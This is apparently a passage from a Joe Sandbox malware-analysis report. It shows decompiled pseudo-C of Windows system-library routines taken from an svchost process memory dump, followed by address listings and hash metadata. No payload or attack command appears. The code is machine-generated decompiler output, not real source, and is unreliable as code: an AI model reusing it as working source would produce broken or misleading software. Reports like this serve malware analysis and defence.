					asm("daa");
					asm("movsd");
					_v1524085249 = _v1524085249 - _t246;
					asm("movsd");
					_t289 = 0x25;
					__eflags = _t246 & 0xa528b403;
					_t336 = _t331 +  *0x203a95b + _t331 +  *0x203a95b +  *((intOrPtr*)(_t346 + _t289 * 2));
					__eflags = _t246 & 0xcccccc03;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x3afff00);
					E03A7D08C(_t289, _t326, _t336);
					_v44 =  *[fs:0x18];
					_t327 = 0;
					 *_a24 = 0;
					_t290 = _a12;
					__eflags = _t290;
					if(_t290 == 0) {
						_t249 = 0xc0000100;
					} else {
						_v8 = 0;
						_t337 = 0xc0000100;
						_v52 = 0xc0000100;
						_t251 = 4;
						while(1) {
							_v40 = _t251;
							__eflags = _t251;
							if(_t251 == 0) {
								break;
							}
							_t303 = _t251 * 0xc;
							_v48 = _t303;
							__eflags = _t290 -  *((intOrPtr*)(_t303 + 0x3a01664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t266 = E03A6E5C0(_a8,  *((intOrPtr*)(_t303 + 0x3a01668)), _t290);
									_t346 = _t346 + 0xc;
									__eflags = _t266;
									if(__eflags == 0) {
										_t337 = E03AA51BE(_t290,  *((intOrPtr*)(_v48 + 0x3a0166c)), _a16, _t327, _t337, __eflags, _a20, _a24);
										_v52 = _t337;
										break;
									} else {
										_t251 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t251 = _t251 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t337;
						__eflags = _t337;
						if(_t337 < 0) {
							__eflags = _t337 - 0xc0000100;
							if(_t337 == 0xc0000100) {
								_t299 = _a4;
								__eflags = _t299;
								if(_t299 != 0) {
									_v36 = _t299;
									__eflags =  *_t299 - _t327;
									if( *_t299 == _t327) {
										_t337 = 0xc0000100;
										goto L76;
									} else {
										_t315 =  *((intOrPtr*)(_v44 + 0x30));
										_t253 =  *((intOrPtr*)(_t315 + 0x10));
										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t299;
										if( *((intOrPtr*)(_t253 + 0x48)) == _t299) {
											__eflags =  *(_t315 + 0x1c);
											if( *(_t315 + 0x1c) == 0) {
												L106:
												_t337 = E03A52AE4( &_v36, _a8, _t290, _a16, _a20, _a24);
												_v32 = _t337;
												__eflags = _t337 - 0xc0000100;
												if(_t337 != 0xc0000100) {
													goto L69;
												} else {
													_t327 = 1;
													_t299 = _v36;
													goto L75;
												}
											} else {
												_t256 = E03A36600( *(_t315 + 0x1c));
												__eflags = _t256;
												if(_t256 != 0) {
													goto L106;
												} else {
													_t299 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t337 = E03A52C50(_t299, _a8, _t290, _a16, _a20, _a24, _t327);
											L76:
											_v32 = _t337;
											goto L69;
										}
									}
									goto L108;
								} else {
									E03A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t337 = _a24;
									_t263 = E03A52AE4( &_v36, _a8, _t290, _a16, _a20, _t337);
									_v32 = _t263;
									__eflags = _t263 - 0xc0000100;
									if(_t263 == 0xc0000100) {
										_v32 = E03A52C50(_v36, _a8, _t290, _a16, _a20, _t337, 1);
									}
									_v8 = _t327;
									E03A52ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t249 = _t337;
					}
					L70:
					return E03A7D0D1(_t249);
				}
				L108:
			}























































                                          0x03a52584
                                          0x03a52586
                                          0x03a52590
                                          0x03a52596
                                          0x03a52597
                                          0x03a52598
                                          0x03a52599
                                          0x03a5259e
                                          0x03a525a4
                                          0x03a525a9
                                          0x03a525ac
                                          0x03a525ae
                                          0x03a525b1
                                          0x03a525b2
                                          0x03a525b5
                                          0x03a525b8
                                          0x03a525bb
                                          0x03a525bc
                                          0x03a525bf
                                          0x03a525c2
                                          0x03a525c5
                                          0x03a525c6
                                          0x03a525cb
                                          0x03a525ce
                                          0x03a525d8
                                          0x03a525db
                                          0x03a525dd
                                          0x03a525de
                                          0x03a525e1
                                          0x03a525e3
                                          0x03a525e9
                                          0x03a526da
                                          0x03a526da
                                          0x03a526dd
                                          0x03a526e2
                                          0x03a95b56
                                          0x00000000
                                          0x03a526e8
                                          0x03a526f9
                                          0x03a526fb
                                          0x03a526fe
                                          0x03a52700
                                          0x03a95b60
                                          0x00000000
                                          0x03a52706
                                          0x03a52706
                                          0x03a5270a
                                          0x03a5270a
                                          0x03a5270d
                                          0x03a52713
                                          0x03a52716
                                          0x03a52718
                                          0x03a5271c
                                          0x03a5271e
                                          0x03a95b6c
                                          0x03a95b6f
                                          0x03a95b7f
                                          0x03a95b89
                                          0x03a95b8e
                                          0x03a95b93
                                          0x03a95b96
                                          0x03a95b9c
                                          0x03a95ba0
                                          0x03a95ba3
                                          0x03a95bab
                                          0x03a95bb0
                                          0x03a95bb3
                                          0x03a95bb3
                                          0x03a95ba3
                                          0x03a52724
                                          0x03a52726
                                          0x03a52729
                                          0x03a5272c
                                          0x03a5279d
                                          0x03a5279d
                                          0x03a527a0
                                          0x03a527a2
                                          0x00000000
                                          0x03a5272e
                                          0x03a5272e
                                          0x03a52731
                                          0x03a52734
                                          0x03a52734
                                          0x03a52736
                                          0x03a95bc1
                                          0x03a95bc1
                                          0x03a95bc4
                                          0x00000000
                                          0x03a95bca
                                          0x03a95bca
                                          0x03a95bcd
                                          0x00000000
                                          0x03a95bd3
                                          0x00000000
                                          0x03a95bd3
                                          0x03a95bcd
                                          0x03a5273c
                                          0x03a5273c
                                          0x03a52742
                                          0x03a52747
                                          0x03a5274a
                                          0x03a5274d
                                          0x03a52750
                                          0x00000000
                                          0x03a52756
                                          0x03a52756
                                          0x00000000
                                          0x03a52902
                                          0x03a52908
                                          0x03a5290b
                                          0x00000000
                                          0x03a52911
                                          0x03a5291c
                                          0x03a52921
                                          0x00000000
                                          0x03a52921
                                          0x00000000
                                          0x00000000
                                          0x03a52880
                                          0x03a52887
                                          0x03a5288c
                                          0x00000000
                                          0x00000000
                                          0x03a52805
                                          0x03a5280a
                                          0x03a52814
                                          0x03a52816
                                          0x00000000
                                          0x00000000
                                          0x03a5281e
                                          0x03a52821
                                          0x03a52823
                                          0x00000000
                                          0x03a52829
                                          0x03a52829
                                          0x03a52831
                                          0x03a5283c
                                          0x03a5283e
                                          0x00000000
                                          0x03a5283e
                                          0x00000000
                                          0x00000000
                                          0x03a5284e
                                          0x03a52850
                                          0x03a52851
                                          0x03a52854
                                          0x03a52857
                                          0x03a5285a
                                          0x03a5285c
                                          0x03a5285d
                                          0x00000000
                                          0x00000000
                                          0x03a5275d
                                          0x03a52761
                                          0x00000000
                                          0x03a52767
                                          0x03a5276e
                                          0x03a52773
                                          0x03a52773
                                          0x03a52776
                                          0x03a52778
                                          0x03a5277e
                                          0x03a5277e
                                          0x03a52781
                                          0x03a52781
                                          0x03a52783
                                          0x03a52784
                                          0x00000000
                                          0x00000000
                                          0x03a95bd8
                                          0x03a95bde
                                          0x03a95be4
                                          0x03a95be6
                                          0x03a95be8
                                          0x03a95be9
                                          0x03a95bee
                                          0x03a95bf8
                                          0x03a95bff
                                          0x03a95c01
                                          0x03a95c04
                                          0x03a95c07
                                          0x03a95c0b
                                          0x03a95c0d
                                          0x03a95c0d
                                          0x03a95c15
                                          0x03a95c18
                                          0x03a95c1b
                                          0x03a95c1b
                                          0x03a95c1e
                                          0x00000000
                                          0x00000000
                                          0x03a528c3
                                          0x03a528c8
                                          0x03a528d2
                                          0x03a528d4
                                          0x03a528d8
                                          0x03a528db
                                          0x03a95c26
                                          0x03a95c28
                                          0x03a95c2d
                                          0x03a95c2d
                                          0x00000000
                                          0x00000000
                                          0x03a95c34
                                          0x03a95c36
                                          0x03a95c49
                                          0x03a95c4e
                                          0x03a95c54
                                          0x03a95c5b
                                          0x03a95c5d
                                          0x03a95c60
                                          0x03a52788
                                          0x03a52788
                                          0x03a5278b
                                          0x03a5278e
                                          0x03a5278e
                                          0x03a5278e
                                          0x03a52791
                                          0x00000000
                                          0x00000000
                                          0x03a52756
                                          0x03a52750
                                          0x00000000
                                          0x03a52794
                                          0x03a52794
                                          0x03a52795
                                          0x03a52798
                                          0x03a52798
                                          0x00000000
                                          0x03a52734
                                          0x03a5272c
                                          0x03a52700
                                          0x03a525ef
                                          0x03a525ef
                                          0x03a525ef
                                          0x03a525f2
                                          0x03a525f8
                                          0x00000000
                                          0x00000000
                                          0x03a525fe
                                          0x00000000
                                          0x03a528e6
                                          0x03a528ec
                                          0x03a528ef
                                          0x03a528f5
                                          0x03a528f8
                                          0x03a528f8
                                          0x00000000
                                          0x03a528f8
                                          0x00000000
                                          0x00000000
                                          0x03a52866
                                          0x03a52866
                                          0x03a52876
                                          0x03a52879
                                          0x00000000
                                          0x00000000
                                          0x03a527e0
                                          0x03a527e7
                                          0x03a527e9
                                          0x03a527eb
                                          0x03a95afd
                                          0x00000000
                                          0x03a95afd
                                          0x00000000
                                          0x00000000
                                          0x03a52633
                                          0x03a52638
                                          0x03a5263b
                                          0x03a5263c
                                          0x03a5263e
                                          0x03a52640
                                          0x03a52642
                                          0x03a52647
                                          0x03a52649
                                          0x03a5264e
                                          0x03a52650
                                          0x03a52653
                                          0x03a52659
                                          0x03a526a2
                                          0x03a526a7
                                          0x03a526ac
                                          0x03a526b2
                                          0x03a95b11
                                          0x03a95b15
                                          0x03a95b17
                                          0x00000000
                                          0x03a526b8
                                          0x03a526b8
                                          0x03a526ba
                                          0x03a527a6
                                          0x03a527a6
                                          0x03a527a9
                                          0x03a527ab
                                          0x03a527b9
                                          0x03a527b9
                                          0x03a527be
                                          0x03a527c1
                                          0x03a527c3
                                          0x03a527c5
                                          0x03a527c7
                                          0x03a95c74
                                          0x03a95c79
                                          0x03a95c79
                                          0x03a527c7
                                          0x00000000
                                          0x03a526c0
                                          0x03a526c0
                                          0x03a526c3
                                          0x03a526c6
                                          0x03a526c6
                                          0x03a526c9
                                          0x03a526c9
                                          0x00000000
                                          0x03a526c9
                                          0x03a526ba
                                          0x03a5265b
                                          0x03a5265b
                                          0x03a5265e
                                          0x03a52667
                                          0x03a5266d
                                          0x03a52677
                                          0x03a5267c
                                          0x03a5267f
                                          0x03a52681
                                          0x03a95b49
                                          0x03a95b4e
                                          0x03a527cd
                                          0x03a527d0
                                          0x03a527d1
                                          0x03a527d2
                                          0x03a527d4
                                          0x03a527dd
                                          0x03a52687
                                          0x03a52687
                                          0x03a5268a
                                          0x03a5268b
                                          0x03a5268e
                                          0x03a5268f
                                          0x03a52691
                                          0x03a52696
                                          0x03a52698
                                          0x03a5269d
                                          0x03a5269f
                                          0x00000000
                                          0x03a5269f
                                          0x03a52681
                                          0x00000000
                                          0x00000000
                                          0x03a52846
                                          0x00000000
                                          0x00000000
                                          0x03a52605
                                          0x03a5260a
                                          0x03a5260c
                                          0x03a52611
                                          0x03a52616
                                          0x03a52619
                                          0x03a52619
                                          0x03a5261e
                                          0x00000000
                                          0x03a52624
                                          0x03a52627
                                          0x03a52627
                                          0x00000000
                                          0x00000000
                                          0x03a95b1f
                                          0x00000000
                                          0x00000000
                                          0x03a52894
                                          0x03a5289b
                                          0x03a5289d
                                          0x03a528a1
                                          0x03a95b2b
                                          0x03a95b2e
                                          0x03a95b2e
                                          0x03a528a7
                                          0x03a528a9
                                          0x03a95b04
                                          0x03a95b09
                                          0x03a95b09
                                          0x03a95b09
                                          0x00000000
                                          0x00000000
                                          0x03a95b35
                                          0x03a95b3c
                                          0x03a528fb
                                          0x03a528fb
                                          0x03a526cc
                                          0x03a526cc
                                          0x03a526d0
                                          0x00000000
                                          0x03a526d2
                                          0x03a526d2
                                          0x00000000
                                          0x03a526d2
                                          0x00000000
                                          0x00000000
                                          0x03a525fe
                                          0x03a5292d
                                          0x03a52930
                                          0x03a52935
                                          0x03a52937
                                          0x03a5293b
                                          0x03a5293c
                                          0x03a5293e
                                          0x03a5293f
                                          0x03a52942
                                          0x03a52947
                                          0x03a52948
                                          0x03a5294f
                                          0x03a5295a
                                          0x03a52962
                                          0x03a52963
                                          0x03a52966
                                          0x03a5296f
                                          0x03a52972
                                          0x03a52973
                                          0x03a52978
                                          0x03a5297b
                                          0x03a52980
                                          0x03a52981
                                          0x03a52982
                                          0x03a52983
                                          0x03a52984
                                          0x03a52985
                                          0x03a52986
                                          0x03a52987
                                          0x03a52988
                                          0x03a52989
                                          0x03a5298a
                                          0x03a5298b
                                          0x03a5298c
                                          0x03a5298d
                                          0x03a5298e
                                          0x03a5298f
                                          0x03a52990
                                          0x03a52992
                                          0x03a52997
                                          0x03a529a3
                                          0x03a529a6
                                          0x03a529ab
                                          0x03a529ad
                                          0x03a529b0
                                          0x03a529b2
                                          0x03a95c80
                                          0x03a529b8
                                          0x03a529b8
                                          0x03a529bb
                                          0x03a529c0
                                          0x03a529c5
                                          0x03a529c6
                                          0x03a529c6
                                          0x03a529c9
                                          0x03a529cb
                                          0x00000000
                                          0x00000000
                                          0x03a529cd
                                          0x03a529d0
                                          0x03a529d9
                                          0x03a529db
                                          0x03a529dd
                                          0x03a52a7f
                                          0x03a52a84
                                          0x03a52a87
                                          0x03a52a89
                                          0x03a95ca1
                                          0x03a95ca3
                                          0x00000000
                                          0x03a52a8f
                                          0x03a52a8f
                                          0x00000000
                                          0x03a52a8f
                                          0x00000000
                                          0x03a529e3
                                          0x03a529e3
                                          0x03a529e3
                                          0x00000000
                                          0x03a529e3
                                          0x03a529dd
                                          0x00000000
                                          0x03a529db
                                          0x03a529e6
                                          0x03a529e9
                                          0x03a529eb
                                          0x03a529ed
                                          0x03a529f3
                                          0x03a529f5
                                          0x03a529f8
                                          0x03a529fa
                                          0x03a52a97
                                          0x03a52a9a
                                          0x03a52a9d
                                          0x03a52add
                                          0x00000000
                                          0x03a52a9f
                                          0x03a52aa2
                                          0x03a52aa5
                                          0x03a52aa8
                                          0x03a52aab
                                          0x03a95cab
                                          0x03a95caf
                                          0x03a95cc5
                                          0x03a95cda
                                          0x03a95cdc
                                          0x03a95cdf
                                          0x03a95ce5
                                          0x00000000
                                          0x03a95ceb
                                          0x03a95ced
                                          0x03a95cee
                                          0x00000000
                                          0x03a95cee
                                          0x03a95cb1
                                          0x03a95cb4
                                          0x03a95cb9
                                          0x03a95cbb
                                          0x00000000
                                          0x03a95cbd
                                          0x03a95cbd
                                          0x00000000
                                          0x03a95cbd
                                          0x03a95cbb
                                          0x03a52ab1
                                          0x03a52ab1
                                          0x03a52ac4
                                          0x03a52ac6
                                          0x03a52ac6
                                          0x00000000
                                          0x03a52ac6
                                          0x03a52aab
                                          0x00000000
                                          0x03a52a00
                                          0x03a52a09
                                          0x03a52a0e
                                          0x03a52a21
                                          0x03a52a24
                                          0x03a52a35
                                          0x03a52a3a
                                          0x03a52a3d
                                          0x03a52a42
                                          0x03a52a59
                                          0x03a52a59
                                          0x03a52a5c
                                          0x03a52a5f
                                          0x03a52a5f
                                          0x03a529fa
                                          0x03a529f3
                                          0x03a52a64
                                          0x03a52a64
                                          0x03a52a6b
                                          0x03a52a6b
                                          0x03a52a6d
                                          0x03a52a72
                                          0x03a52a72
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: 98e99ea1d920db920a84784e5cc8372709210a9c3e1823dcae3e2065d819c220
                                          • Instruction ID: 7eba70ae540805a1c86065c1adcbb00d76b1dcafde5fb94eda9f25951e4f6382
                                          • Opcode Fuzzy Hash: 98e99ea1d920db920a84784e5cc8372709210a9c3e1823dcae3e2065d819c220
                                          • Instruction Fuzzy Hash: 2CC17D75E00219AFDB15DF98D981BADB7B5FF89700F58442AF801BB350DB34A941CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E03A5FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E03A3EEF0(0x3b17b60);
					_t134 =  *0x3b17b84; // 0x77997b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3b17b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3b17b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03A36D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E03A376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E03AC8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E03A2B150();
													}
													_t116 = E03AC6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E03A375CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3b18638; // 0x0
																	_t122 = L03A338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E03A376E2(_t154);
																			goto L41;
																		}
																	} else {
																		E03A376E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L03A5FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L03A370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E03A5FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E03A5FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E03A5FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E03A5FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E03A5FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3b17b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3b17b84 = _t75;
						_t73 = E03A3EB70(_t134, 0x3b17b60);
						if( *0x3b17b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E03A3FF60( *0x3b17b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                          0x03a5fab0
                                          0x03a5fab2
                                          0x03a5fab3
                                          0x03a5fab4
                                          0x03a5fabc
                                          0x03a5fac0
                                          0x03a5fb14
                                          0x03a5fb17
                                          0x03a5fac2
                                          0x03a5fac8
                                          0x03a5facd
                                          0x03a5fad3
                                          0x03a5fad3
                                          0x03a5fadd
                                          0x03a5fb18
                                          0x03a5fb1b
                                          0x03a5fb1d
                                          0x03a5fb1e
                                          0x03a5fb1f
                                          0x03a5fb20
                                          0x03a5fb21
                                          0x03a5fb22
                                          0x03a5fb23
                                          0x03a5fb24
                                          0x03a5fb25
                                          0x03a5fb26
                                          0x03a5fb27
                                          0x03a5fb28
                                          0x03a5fb29
                                          0x03a5fb2a
                                          0x03a5fb2b
                                          0x03a5fb2c
                                          0x03a5fb2d
                                          0x03a5fb2e
                                          0x03a5fb2f
                                          0x03a5fb3a
                                          0x03a5fb3b
                                          0x03a5fb3e
                                          0x03a5fb41
                                          0x03a5fb44
                                          0x03a5fb47
                                          0x03a5fb4a
                                          0x03a5fb4d
                                          0x03a5fb53
                                          0x03a9bdcb
                                          0x03a9bdcb
                                          0x03a5fb59
                                          0x03a5fb5b
                                          0x03a5fb5b
                                          0x03a5fb5e
                                          0x03a9bdd5
                                          0x03a9bdd8
                                          0x00000000
                                          0x03a9bdda
                                          0x00000000
                                          0x03a9bdda
                                          0x03a5fb64
                                          0x03a5fb64
                                          0x03a5fb64
                                          0x03a5fb67
                                          0x03a5fb6e
                                          0x03a5fb70
                                          0x03a5fb72
                                          0x00000000
                                          0x03a5fb78
                                          0x03a5fb7a
                                          0x03a5fb7a
                                          0x03a5fb7d
                                          0x03a5fb80
                                          0x03a9bddf
                                          0x03a9bde1
                                          0x00000000
                                          0x03a9bde3
                                          0x00000000
                                          0x03a9bde3
                                          0x03a5fb86
                                          0x03a5fb86
                                          0x03a5fb86
                                          0x03a5fb8b
                                          0x03a5fb90
                                          0x03a5fb92
                                          0x03a5fb94
                                          0x03a5fb9a
                                          0x03a5fb9b
                                          0x03a5fba1
                                          0x03a9bde8
                                          0x03a9bdeb
                                          0x03a9bded
                                          0x03a9beb5
                                          0x03a9beb5
                                          0x03a9bebb
                                          0x03a9bebd
                                          0x03a9bec3
                                          0x03a9bed2
                                          0x03a9bedd
                                          0x03a9bedd
                                          0x03a9beed
                                          0x00000000
                                          0x03a9bdf3
                                          0x03a9bdfe
                                          0x03a9be06
                                          0x03a9be0b
                                          0x03a9be0d
                                          0x03a9be0f
                                          0x03a9be14
                                          0x03a9be19
                                          0x03a9be20
                                          0x03a9be25
                                          0x03a9be27
                                          0x03a9be35
                                          0x03a9be39
                                          0x03a9be46
                                          0x03a9be4f
                                          0x03a9be54
                                          0x03a9be56
                                          0x03a9bef8
                                          0x03a9bef8
                                          0x00000000
                                          0x03a9be5c
                                          0x03a9be5c
                                          0x03a9be60
                                          0x00000000
                                          0x03a9be66
                                          0x03a9be66
                                          0x03a9be7f
                                          0x03a9be84
                                          0x03a9be87
                                          0x03a9be89
                                          0x03a9be8b
                                          0x03a9be99
                                          0x03a9be9d
                                          0x03a9bea0
                                          0x03a9beac
                                          0x03a9beaf
                                          0x03a9beb1
                                          0x03a9beb3
                                          0x03a9beb3
                                          0x00000000
                                          0x03a9bea2
                                          0x03a9bea2
                                          0x00000000
                                          0x03a9bea2
                                          0x03a9be8d
                                          0x03a9be8d
                                          0x03a9be92
                                          0x00000000
                                          0x03a9be92
                                          0x03a9be8b
                                          0x03a9be60
                                          0x03a9be3b
                                          0x03a9be3b
                                          0x03a9be3e
                                          0x00000000
                                          0x03a9be40
                                          0x03a9be40
                                          0x03a9be44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a9be44
                                          0x03a9be3e
                                          0x03a9be29
                                          0x03a9be29
                                          0x00000000
                                          0x03a9be29
                                          0x03a9be27
                                          0x00000000
                                          0x03a5fba7
                                          0x03a5fba7
                                          0x03a5fbab
                                          0x03a9bf02
